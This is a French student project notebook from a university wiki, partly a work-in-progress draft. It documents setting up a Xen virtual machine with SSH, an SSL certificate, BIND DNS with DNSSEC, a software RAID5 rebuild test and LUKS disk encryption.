                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46288</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46288"/>
				<updated>2017-11-17T09:00:08Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Création d'une machine virtuelle Xen sur Cordouan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
